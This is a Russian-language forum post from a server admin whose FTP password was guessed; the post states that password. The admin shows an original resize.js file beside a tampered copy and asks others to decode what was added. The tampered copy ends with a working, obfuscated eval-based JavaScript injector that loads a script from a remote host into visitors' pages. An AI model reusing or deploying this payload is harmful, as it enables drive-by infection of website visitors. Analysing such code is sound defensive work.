Ubuntu server 9.10 + vsftpd 2.2.0-1Сегодня утром просматривая отчёты logwatch, заметил что кто-то, каким-то образом подобрал пароль на наш ftp (пароль был f2t3p4!) и заменил все .js файлы на свои.
.js файлы лежали в то числе в Driver Pack Solution.
Оригинальный файл DRPSu12\tools\modules\resize.js
----------------------------------------------------------------
// On change size of the window
try {
self.resizeTo(width,height - 25);
self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));
//if (screen.width==640){
if ((screen.width<width)||(screen.height<height)){
self.resizeTo(800,600 - 25);
self.moveTo(0,0);
window.attachEvent('onload',function(){tooglePanel();});
}
// if (screen.height<height){ //On netbooks
// window.attachEvent('onload',function(){
// self.resizeTo(width,$(window).height() - 25);
//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;
//var callHeight = (screen.height / 2) - (($(window).height()+80) / 2);
//alert((screen.height / 2));
//alert(($(window).height()+80) / 2);
// self.moveTo((callWidth>0?callWidth:0), callHeight);
// });
// }
}
catch(err) { }
// Change title window
document.title = document.title + " " + version + " " + verType;
//Auto hide/show left panel
try {
window.attachEvent('onresize',
function(){
if ($(window).width()<718){ //hide panel
tooglePanel(false);
}
else if ($(window).width()>(800)){ //show panel
tooglePanel(true);
}
}
);
}
catch(err) { }
---------------------------------------------------------------------------------
Изменённый файл DRPSu12\tools\modules\resize.js
---------------------------------------------------------------------------------
// On change size of the window
try {
self.resizeTo(width,height - 25);
self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));
//if (screen.width==640){
if ((screen.width<width)||(screen.height<height)){
self.resizeTo(800,600 - 25);
self.moveTo(0,0);
window.attachEvent('onload',function(){tooglePanel();});
}
// if (screen.height<height){ //On netbooks
// window.attachEvent('onload',function(){
// self.resizeTo(width,$(window).height() - 25);
//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;
//var callHeight = (screen.height / 2) - (($(window).height()+80) / 2);
//alert((screen.height / 2));
//alert(($(window).height()+80) / 2);
// self.moveTo((callWidth>0?callWidth:0), callHeight);
// });
// }
}
catch(err) { }
// Change title window
document.title = document.title + " " + version + " " + verType;
//Auto hide/show left panel
try {
window.attachEvent('onresize',
function(){
if ($(window).width()<718){ //hide panel
tooglePanel(false);
}
else if ($(window).width()>(800)){ //show panel
tooglePanel(true);
}
}
);
}
catch(err) { }
c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i14i81i79i59i80i70i75i6i78i77i63i74i76i74i65i68i74i71i6i75i61i68i62i65i72i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;690!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](w[j]*1+40);}if(f)z=s;e(z);
-------------------------------------------------------------------------------------
Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста, кто может?